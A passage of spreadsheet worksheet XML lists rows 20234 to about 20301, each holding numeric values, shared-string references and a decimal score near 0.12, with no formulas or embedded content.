      <c r="B20234" s="2">
        <v>6715799.0</v>
      </c>
      <c r="C20234" s="2" t="s">
        <v>19511</v>
      </c>
      <c r="D20234" s="2">
        <v>1.0</v>
      </c>
      <c r="E20234" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20234" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="20235" ht="15.75" customHeight="1">
      <c r="A20235" s="1">
        <v>2099.0</v>
      </c>
      <c r="B20235" s="2">
        <v>3.130418E7</v>
      </c>
      <c r="C20235" s="2" t="s">
        <v>19512</v>
      </c>
      <c r="D20235" s="2">
        <v>1.0</v>
      </c>
      <c r="E20235" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20235" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="20236" ht="15.75" customHeight="1">
      <c r="A20236" s="1">
        <v>3424.0</v>
      </c>
      <c r="B20236" s="2">
        <v>3.8164349E7</v>
      </c>
      <c r="C20236" s="2" t="s">
        <v>19513</v>
      </c>
      <c r="D20236" s="2">
        <v>1.0</v>
      </c>
      <c r="E20236" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20236" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="20237" ht="15.75" customHeight="1">
      <c r="A20237" s="1">
        <v>4794.0</v>
      </c>
      <c r="B20237" s="2">
        <v>4.350288E7</v>
      </c>
      <c r="C20237" s="2" t="s">
        <v>19514</v>
      </c>
      <c r="D20237" s="2">
        <v>1.0</v>
      </c>
      <c r="E20237" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20237" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="20238" ht="15.75" customHeight="1">
      <c r="A20238" s="1">
        <v>12190.0</v>
      </c>
      <c r="B20238" s="2">
        <v>2.7481027E7</v>
      </c>
      <c r="C20238" s="2" t="s">
        <v>19515</v>
      </c>
      <c r="D20238" s="2">
        <v>1.0</v>
      </c>
      <c r="E20238" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20238" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="20239" ht="15.75" customHeight="1">
      <c r="A20239" s="1">
        <v>16252.0</v>
      </c>
      <c r="B20239" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C20239" s="2" t="s">
        <v>19516</v>
      </c>
      <c r="D20239" s="2">
        <v>1.0</v>
      </c>
      <c r="E20239" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20239" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="20240" ht="15.75" customHeight="1">
      <c r="A20240" s="1">
        <v>16556.0</v>
      </c>
      <c r="B20240" s="2">
        <v>4.6833738E7</v>
      </c>
      <c r="C20240" s="2" t="s">
        <v>19517</v>
      </c>
      <c r="D20240" s="2">
        <v>1.0</v>
      </c>
      <c r="E20240" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20240" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="20241" ht="15.75" customHeight="1">
      <c r="A20241" s="1">
        <v>2018.0</v>
      </c>
      <c r="B20241" s="2">
        <v>3.0735752E7</v>
      </c>
      <c r="C20241" s="2" t="s">
        <v>19518</v>
      </c>
      <c r="D20241" s="2">
        <v>1.0</v>
      </c>
      <c r="E20241" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20241" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20242" ht="15.75" customHeight="1">
      <c r="A20242" s="1">
        <v>3123.0</v>
      </c>
      <c r="B20242" s="2">
        <v>3.6838057E7</v>
      </c>
      <c r="C20242" s="2" t="s">
        <v>19519</v>
      </c>
      <c r="D20242" s="2">
        <v>1.0</v>
      </c>
      <c r="E20242" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20242" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20243" ht="15.75" customHeight="1">
      <c r="A20243" s="1">
        <v>3675.0</v>
      </c>
      <c r="B20243" s="2">
        <v>3.9447251E7</v>
      </c>
      <c r="C20243" s="2" t="s">
        <v>19520</v>
      </c>
      <c r="D20243" s="2">
        <v>1.0</v>
      </c>
      <c r="E20243" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20243" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20244" ht="15.75" customHeight="1">
      <c r="A20244" s="1">
        <v>4342.0</v>
      </c>
      <c r="B20244" s="2">
        <v>4.2072684E7</v>
      </c>
      <c r="C20244" s="2" t="s">
        <v>19521</v>
      </c>
      <c r="D20244" s="2">
        <v>1.0</v>
      </c>
      <c r="E20244" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20244" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20245" ht="15.75" customHeight="1">
      <c r="A20245" s="1">
        <v>4508.0</v>
      </c>
      <c r="B20245" s="2">
        <v>4.2586294E7</v>
      </c>
      <c r="C20245" s="2" t="s">
        <v>19522</v>
      </c>
      <c r="D20245" s="2">
        <v>1.0</v>
      </c>
      <c r="E20245" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20245" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20246" ht="15.75" customHeight="1">
      <c r="A20246" s="1">
        <v>4610.0</v>
      </c>
      <c r="B20246" s="2">
        <v>4.2905226E7</v>
      </c>
      <c r="C20246" s="2" t="s">
        <v>19523</v>
      </c>
      <c r="D20246" s="2">
        <v>1.0</v>
      </c>
      <c r="E20246" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20246" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20247" ht="15.75" customHeight="1">
      <c r="A20247" s="1">
        <v>4637.0</v>
      </c>
      <c r="B20247" s="2">
        <v>4.3008433E7</v>
      </c>
      <c r="C20247" s="2" t="s">
        <v>19524</v>
      </c>
      <c r="D20247" s="2">
        <v>1.0</v>
      </c>
      <c r="E20247" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20247" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20248" ht="15.75" customHeight="1">
      <c r="A20248" s="1">
        <v>5280.0</v>
      </c>
      <c r="B20248" s="2">
        <v>4.5183872E7</v>
      </c>
      <c r="C20248" s="2" t="s">
        <v>19525</v>
      </c>
      <c r="D20248" s="2">
        <v>1.0</v>
      </c>
      <c r="E20248" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20248" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20249" ht="15.75" customHeight="1">
      <c r="A20249" s="1">
        <v>9144.0</v>
      </c>
      <c r="B20249" s="2">
        <v>5.5263144E7</v>
      </c>
      <c r="C20249" s="2" t="s">
        <v>19526</v>
      </c>
      <c r="D20249" s="2">
        <v>1.0</v>
      </c>
      <c r="E20249" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20249" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20250" ht="15.75" customHeight="1">
      <c r="A20250" s="1">
        <v>10468.0</v>
      </c>
      <c r="B20250" s="2">
        <v>1.0871077E7</v>
      </c>
      <c r="C20250" s="2" t="s">
        <v>19527</v>
      </c>
      <c r="D20250" s="2">
        <v>1.0</v>
      </c>
      <c r="E20250" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20250" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20251" ht="15.75" customHeight="1">
      <c r="A20251" s="1">
        <v>10931.0</v>
      </c>
      <c r="B20251" s="2">
        <v>1.6920952E7</v>
      </c>
      <c r="C20251" s="5" t="s">
        <v>19528</v>
      </c>
      <c r="D20251" s="2">
        <v>1.0</v>
      </c>
      <c r="E20251" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20251" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20252" ht="15.75" customHeight="1">
      <c r="A20252" s="1">
        <v>10999.0</v>
      </c>
      <c r="B20252" s="2">
        <v>1.7646671E7</v>
      </c>
      <c r="C20252" s="2" t="s">
        <v>19529</v>
      </c>
      <c r="D20252" s="2">
        <v>1.0</v>
      </c>
      <c r="E20252" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20252" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20253" ht="15.75" customHeight="1">
      <c r="A20253" s="1">
        <v>12801.0</v>
      </c>
      <c r="B20253" s="2">
        <v>3.1419164E7</v>
      </c>
      <c r="C20253" s="2" t="s">
        <v>19530</v>
      </c>
      <c r="D20253" s="2">
        <v>1.0</v>
      </c>
      <c r="E20253" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20253" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20254" ht="15.75" customHeight="1">
      <c r="A20254" s="1">
        <v>12877.0</v>
      </c>
      <c r="B20254" s="2">
        <v>3.1950208E7</v>
      </c>
      <c r="C20254" s="2" t="s">
        <v>19531</v>
      </c>
      <c r="D20254" s="2">
        <v>1.0</v>
      </c>
      <c r="E20254" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20254" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20255" ht="15.75" customHeight="1">
      <c r="A20255" s="1">
        <v>14693.0</v>
      </c>
      <c r="B20255" s="2">
        <v>4.0542825E7</v>
      </c>
      <c r="C20255" s="2" t="s">
        <v>19532</v>
      </c>
      <c r="D20255" s="2">
        <v>1.0</v>
      </c>
      <c r="E20255" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20255" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20256" ht="15.75" customHeight="1">
      <c r="A20256" s="1">
        <v>14890.0</v>
      </c>
      <c r="B20256" s="2">
        <v>4.1129678E7</v>
      </c>
      <c r="C20256" s="2" t="s">
        <v>19533</v>
      </c>
      <c r="D20256" s="2">
        <v>1.0</v>
      </c>
      <c r="E20256" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20256" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20257" ht="15.75" customHeight="1">
      <c r="A20257" s="1">
        <v>16045.0</v>
      </c>
      <c r="B20257" s="2">
        <v>4.5204344E7</v>
      </c>
      <c r="C20257" s="2" t="s">
        <v>19534</v>
      </c>
      <c r="D20257" s="2">
        <v>1.0</v>
      </c>
      <c r="E20257" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20257" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20258" ht="15.75" customHeight="1">
      <c r="A20258" s="1">
        <v>24158.0</v>
      </c>
      <c r="B20258" s="2">
        <v>1.0133771E7</v>
      </c>
      <c r="C20258" s="2" t="s">
        <v>19535</v>
      </c>
      <c r="D20258" s="2">
        <v>1.0</v>
      </c>
      <c r="E20258" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20258" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20259" ht="15.75" customHeight="1">
      <c r="A20259" s="1">
        <v>24606.0</v>
      </c>
      <c r="B20259" s="2">
        <v>1.1435929E7</v>
      </c>
      <c r="C20259" s="2" t="s">
        <v>19536</v>
      </c>
      <c r="D20259" s="2">
        <v>1.0</v>
      </c>
      <c r="E20259" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20259" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20260" ht="15.75" customHeight="1">
      <c r="A20260" s="1">
        <v>28296.0</v>
      </c>
      <c r="B20260" s="2">
        <v>2.5593485E7</v>
      </c>
      <c r="C20260" s="2" t="s">
        <v>19537</v>
      </c>
      <c r="D20260" s="2">
        <v>1.0</v>
      </c>
      <c r="E20260" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20260" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20261" ht="15.75" customHeight="1">
      <c r="A20261" s="1">
        <v>28400.0</v>
      </c>
      <c r="B20261" s="2">
        <v>2.6268096E7</v>
      </c>
      <c r="C20261" s="2" t="s">
        <v>19538</v>
      </c>
      <c r="D20261" s="2">
        <v>1.0</v>
      </c>
      <c r="E20261" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20261" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20262" ht="15.75" customHeight="1">
      <c r="A20262" s="1">
        <v>28857.0</v>
      </c>
      <c r="B20262" s="2">
        <v>2.9022938E7</v>
      </c>
      <c r="C20262" s="2" t="s">
        <v>19539</v>
      </c>
      <c r="D20262" s="2">
        <v>1.0</v>
      </c>
      <c r="E20262" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20262" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20263" ht="15.75" customHeight="1">
      <c r="A20263" s="1">
        <v>29430.0</v>
      </c>
      <c r="B20263" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C20263" s="2" t="s">
        <v>19540</v>
      </c>
      <c r="D20263" s="2">
        <v>1.0</v>
      </c>
      <c r="E20263" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20263" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20264" ht="15.75" customHeight="1">
      <c r="A20264" s="1">
        <v>29552.0</v>
      </c>
      <c r="B20264" s="2">
        <v>3.3089137E7</v>
      </c>
      <c r="C20264" s="2" t="s">
        <v>19541</v>
      </c>
      <c r="D20264" s="2">
        <v>1.0</v>
      </c>
      <c r="E20264" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20264" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="20265" ht="15.75" customHeight="1">
      <c r="A20265" s="1">
        <v>2677.0</v>
      </c>
      <c r="B20265" s="2">
        <v>3.4796164E7</v>
      </c>
      <c r="C20265" s="2" t="s">
        <v>19542</v>
      </c>
      <c r="D20265" s="2">
        <v>1.0</v>
      </c>
      <c r="E20265" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20265" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="20266" ht="15.75" customHeight="1">
      <c r="A20266" s="1">
        <v>12319.0</v>
      </c>
      <c r="B20266" s="2">
        <v>2.8458847E7</v>
      </c>
      <c r="C20266" s="2" t="s">
        <v>19543</v>
      </c>
      <c r="D20266" s="2">
        <v>1.0</v>
      </c>
      <c r="E20266" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20266" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="20267" ht="15.75" customHeight="1">
      <c r="A20267" s="1">
        <v>15752.0</v>
      </c>
      <c r="B20267" s="2">
        <v>4.4140761E7</v>
      </c>
      <c r="C20267" s="2" t="s">
        <v>19544</v>
      </c>
      <c r="D20267" s="2">
        <v>1.0</v>
      </c>
      <c r="E20267" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20267" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="20268" ht="15.75" customHeight="1">
      <c r="A20268" s="1">
        <v>17299.0</v>
      </c>
      <c r="B20268" s="2">
        <v>4.9261984E7</v>
      </c>
      <c r="C20268" s="2" t="s">
        <v>19545</v>
      </c>
      <c r="D20268" s="2">
        <v>1.0</v>
      </c>
      <c r="E20268" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20268" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="20269" ht="15.75" customHeight="1">
      <c r="A20269" s="1">
        <v>22734.0</v>
      </c>
      <c r="B20269" s="2">
        <v>4.3973885E7</v>
      </c>
      <c r="C20269" s="2" t="s">
        <v>19546</v>
      </c>
      <c r="D20269" s="2">
        <v>1.0</v>
      </c>
      <c r="E20269" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20269" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="20270" ht="15.75" customHeight="1">
      <c r="A20270" s="1">
        <v>24333.0</v>
      </c>
      <c r="B20270" s="2">
        <v>1.0671858E7</v>
      </c>
      <c r="C20270" s="2" t="s">
        <v>19547</v>
      </c>
      <c r="D20270" s="2">
        <v>1.0</v>
      </c>
      <c r="E20270" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20270" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="20271" ht="15.75" customHeight="1">
      <c r="A20271" s="1">
        <v>11652.0</v>
      </c>
      <c r="B20271" s="2">
        <v>2.3290912E7</v>
      </c>
      <c r="C20271" s="2" t="s">
        <v>19548</v>
      </c>
      <c r="D20271" s="2">
        <v>1.0</v>
      </c>
      <c r="E20271" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20271" s="2">
        <v>0.121283255086072</v>
      </c>
    </row>
    <row r="20272" ht="15.75" customHeight="1">
      <c r="A20272" s="1">
        <v>2003.0</v>
      </c>
      <c r="B20272" s="2">
        <v>3.0634757E7</v>
      </c>
      <c r="C20272" s="2" t="s">
        <v>19549</v>
      </c>
      <c r="D20272" s="2">
        <v>1.0</v>
      </c>
      <c r="E20272" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20272" s="2">
        <v>0.1209677419354839</v>
      </c>
    </row>
    <row r="20273" ht="15.75" customHeight="1">
      <c r="A20273" s="1">
        <v>6897.0</v>
      </c>
      <c r="B20273" s="2">
        <v>4.9796523E7</v>
      </c>
      <c r="C20273" s="2" t="s">
        <v>19550</v>
      </c>
      <c r="D20273" s="2">
        <v>1.0</v>
      </c>
      <c r="E20273" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20273" s="2">
        <v>0.1209677419354839</v>
      </c>
    </row>
    <row r="20274" ht="15.75" customHeight="1">
      <c r="A20274" s="1">
        <v>9365.0</v>
      </c>
      <c r="B20274" s="2">
        <v>5.5681706E7</v>
      </c>
      <c r="C20274" s="2" t="s">
        <v>19551</v>
      </c>
      <c r="D20274" s="2">
        <v>1.0</v>
      </c>
      <c r="E20274" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20274" s="2">
        <v>0.1209677419354839</v>
      </c>
    </row>
    <row r="20275" ht="15.75" customHeight="1">
      <c r="A20275" s="1">
        <v>10001.0</v>
      </c>
      <c r="B20275" s="2">
        <v>5.7012739E7</v>
      </c>
      <c r="C20275" s="2" t="s">
        <v>19552</v>
      </c>
      <c r="D20275" s="2">
        <v>1.0</v>
      </c>
      <c r="E20275" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20275" s="2">
        <v>0.1209677419354839</v>
      </c>
    </row>
    <row r="20276" ht="15.75" customHeight="1">
      <c r="A20276" s="1">
        <v>9004.0</v>
      </c>
      <c r="B20276" s="2">
        <v>5.4974876E7</v>
      </c>
      <c r="C20276" s="2" t="s">
        <v>19553</v>
      </c>
      <c r="D20276" s="2">
        <v>1.0</v>
      </c>
      <c r="E20276" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20276" s="2">
        <v>0.1208112874779542</v>
      </c>
    </row>
    <row r="20277" ht="15.75" customHeight="1">
      <c r="A20277" s="1">
        <v>2546.0</v>
      </c>
      <c r="B20277" s="2">
        <v>3.4121058E7</v>
      </c>
      <c r="C20277" s="2" t="s">
        <v>19554</v>
      </c>
      <c r="D20277" s="2">
        <v>1.0</v>
      </c>
      <c r="E20277" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20277" s="2">
        <v>0.1206597222222222</v>
      </c>
    </row>
    <row r="20278" ht="15.75" customHeight="1">
      <c r="A20278" s="1">
        <v>3868.0</v>
      </c>
      <c r="B20278" s="2">
        <v>4.0329895E7</v>
      </c>
      <c r="C20278" s="2" t="s">
        <v>19555</v>
      </c>
      <c r="D20278" s="2">
        <v>1.0</v>
      </c>
      <c r="E20278" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20278" s="2">
        <v>0.1206140350877193</v>
      </c>
    </row>
    <row r="20279" ht="15.75" customHeight="1">
      <c r="A20279" s="1">
        <v>1974.0</v>
      </c>
      <c r="B20279" s="2">
        <v>3.0412261E7</v>
      </c>
      <c r="C20279" s="2" t="s">
        <v>19556</v>
      </c>
      <c r="D20279" s="2">
        <v>1.0</v>
      </c>
      <c r="E20279" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20279" s="2">
        <v>0.120545073375262</v>
      </c>
    </row>
    <row r="20280" ht="15.75" customHeight="1">
      <c r="A20280" s="1">
        <v>2356.0</v>
      </c>
      <c r="B20280" s="2">
        <v>3.3138784E7</v>
      </c>
      <c r="C20280" s="2" t="s">
        <v>19557</v>
      </c>
      <c r="D20280" s="2">
        <v>1.0</v>
      </c>
      <c r="E20280" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20280" s="2">
        <v>0.120545073375262</v>
      </c>
    </row>
    <row r="20281" ht="15.75" customHeight="1">
      <c r="A20281" s="1">
        <v>14330.0</v>
      </c>
      <c r="B20281" s="2">
        <v>3.8758474E7</v>
      </c>
      <c r="C20281" s="2" t="s">
        <v>19558</v>
      </c>
      <c r="D20281" s="2">
        <v>1.0</v>
      </c>
      <c r="E20281" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20281" s="2">
        <v>0.1205128205128205</v>
      </c>
    </row>
    <row r="20282" ht="15.75" customHeight="1">
      <c r="A20282" s="1">
        <v>3768.0</v>
      </c>
      <c r="B20282" s="2">
        <v>3.9828853E7</v>
      </c>
      <c r="C20282" s="2" t="s">
        <v>19559</v>
      </c>
      <c r="D20282" s="2">
        <v>1.0</v>
      </c>
      <c r="E20282" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20282" s="2">
        <v>0.1203703703703704</v>
      </c>
    </row>
    <row r="20283" ht="15.75" customHeight="1">
      <c r="A20283" s="1">
        <v>8660.0</v>
      </c>
      <c r="B20283" s="2">
        <v>5.435453E7</v>
      </c>
      <c r="C20283" s="2" t="s">
        <v>19560</v>
      </c>
      <c r="D20283" s="2">
        <v>1.0</v>
      </c>
      <c r="E20283" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20283" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="20284" ht="15.75" customHeight="1">
      <c r="A20284" s="1">
        <v>11303.0</v>
      </c>
      <c r="B20284" s="2">
        <v>2.0984385E7</v>
      </c>
      <c r="C20284" s="2" t="s">
        <v>19561</v>
      </c>
      <c r="D20284" s="2">
        <v>1.0</v>
      </c>
      <c r="E20284" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20284" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="20285" ht="15.75" customHeight="1">
      <c r="A20285" s="1">
        <v>13607.0</v>
      </c>
      <c r="B20285" s="2">
        <v>3.5814603E7</v>
      </c>
      <c r="C20285" s="2" t="s">
        <v>19562</v>
      </c>
      <c r="D20285" s="2">
        <v>1.0</v>
      </c>
      <c r="E20285" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20285" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="20286" ht="15.75" customHeight="1">
      <c r="A20286" s="1">
        <v>13681.0</v>
      </c>
      <c r="B20286" s="2">
        <v>3.6063016E7</v>
      </c>
      <c r="C20286" s="2" t="s">
        <v>19563</v>
      </c>
      <c r="D20286" s="2">
        <v>1.0</v>
      </c>
      <c r="E20286" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20286" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="20287" ht="15.75" customHeight="1">
      <c r="A20287" s="1">
        <v>25413.0</v>
      </c>
      <c r="B20287" s="2">
        <v>1.3782537E7</v>
      </c>
      <c r="C20287" s="2" t="s">
        <v>19564</v>
      </c>
      <c r="D20287" s="2">
        <v>1.0</v>
      </c>
      <c r="E20287" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20287" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="20288" ht="15.75" customHeight="1">
      <c r="A20288" s="1">
        <v>5921.0</v>
      </c>
      <c r="B20288" s="2">
        <v>4.722662E7</v>
      </c>
      <c r="C20288" s="2" t="s">
        <v>19565</v>
      </c>
      <c r="D20288" s="2">
        <v>1.0</v>
      </c>
      <c r="E20288" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20288" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="20289" ht="15.75" customHeight="1">
      <c r="A20289" s="1">
        <v>8792.0</v>
      </c>
      <c r="B20289" s="2">
        <v>5.4596527E7</v>
      </c>
      <c r="C20289" s="2" t="s">
        <v>19566</v>
      </c>
      <c r="D20289" s="2">
        <v>1.0</v>
      </c>
      <c r="E20289" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20289" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="20290" ht="15.75" customHeight="1">
      <c r="A20290" s="1">
        <v>12366.0</v>
      </c>
      <c r="B20290" s="2">
        <v>2.8782128E7</v>
      </c>
      <c r="C20290" s="2" t="s">
        <v>19567</v>
      </c>
      <c r="D20290" s="2">
        <v>1.0</v>
      </c>
      <c r="E20290" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20290" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="20291" ht="15.75" customHeight="1">
      <c r="A20291" s="1">
        <v>20066.0</v>
      </c>
      <c r="B20291" s="2">
        <v>8697159.0</v>
      </c>
      <c r="C20291" s="2" t="s">
        <v>19568</v>
      </c>
      <c r="D20291" s="2">
        <v>1.0</v>
      </c>
      <c r="E20291" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20291" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="20292" ht="15.75" customHeight="1">
      <c r="A20292" s="1">
        <v>1895.0</v>
      </c>
      <c r="B20292" s="2">
        <v>2.9861087E7</v>
      </c>
      <c r="C20292" s="2" t="s">
        <v>19569</v>
      </c>
      <c r="D20292" s="2">
        <v>1.0</v>
      </c>
      <c r="E20292" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20292" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="20293" ht="15.75" customHeight="1">
      <c r="A20293" s="1">
        <v>2075.0</v>
      </c>
      <c r="B20293" s="2">
        <v>3.1127296E7</v>
      </c>
      <c r="C20293" s="2" t="s">
        <v>19570</v>
      </c>
      <c r="D20293" s="2">
        <v>1.0</v>
      </c>
      <c r="E20293" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20293" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="20294" ht="15.75" customHeight="1">
      <c r="A20294" s="1">
        <v>4251.0</v>
      </c>
      <c r="B20294" s="2">
        <v>4.1803541E7</v>
      </c>
      <c r="C20294" s="2" t="s">
        <v>19571</v>
      </c>
      <c r="D20294" s="2">
        <v>1.0</v>
      </c>
      <c r="E20294" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20294" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="20295" ht="15.75" customHeight="1">
      <c r="A20295" s="1">
        <v>4284.0</v>
      </c>
      <c r="B20295" s="2">
        <v>4.1894967E7</v>
      </c>
      <c r="C20295" s="2" t="s">
        <v>19572</v>
      </c>
      <c r="D20295" s="2">
        <v>1.0</v>
      </c>
      <c r="E20295" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20295" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="20296" ht="15.75" customHeight="1">
      <c r="A20296" s="1">
        <v>3115.0</v>
      </c>
      <c r="B20296" s="2">
        <v>3.6772887E7</v>
      </c>
      <c r="C20296" s="2" t="s">
        <v>19573</v>
      </c>
      <c r="D20296" s="2">
        <v>1.0</v>
      </c>
      <c r="E20296" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20296" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="20297" ht="15.75" customHeight="1">
      <c r="A20297" s="1">
        <v>5908.0</v>
      </c>
      <c r="B20297" s="2">
        <v>4.7202668E7</v>
      </c>
      <c r="C20297" s="2" t="s">
        <v>19574</v>
      </c>
      <c r="D20297" s="2">
        <v>1.0</v>
      </c>
      <c r="E20297" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20297" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="20298" ht="15.75" customHeight="1">
      <c r="A20298" s="1">
        <v>9586.0</v>
      </c>
      <c r="B20298" s="2">
        <v>5.6098708E7</v>
      </c>
      <c r="C20298" s="2" t="s">
        <v>19575</v>
      </c>
      <c r="D20298" s="2">
        <v>1.0</v>
      </c>
      <c r="E20298" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20298" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="20299" ht="15.75" customHeight="1">
      <c r="A20299" s="1">
        <v>17570.0</v>
      </c>
      <c r="B20299" s="2">
        <v>5.0261813E7</v>
      </c>
      <c r="C20299" s="2" t="s">
        <v>19576</v>
      </c>
      <c r="D20299" s="2">
        <v>1.0</v>
      </c>
      <c r="E20299" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20299" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="20300" ht="15.75" customHeight="1">
      <c r="A20300" s="1">
        <v>19078.0</v>
      </c>
      <c r="B20300" s="2">
        <v>5.4639556E7</v>
      </c>
      <c r="C20300" s="2" t="s">
        <v>19577</v>
      </c>
      <c r="D20300" s="2">
        <v>1.0</v>
      </c>
      <c r="E20300" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20300" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="20301" ht="15.75" customHeight="1">
      <c r="A20301" s="1">
        <v>1073.0</v>
      </c>
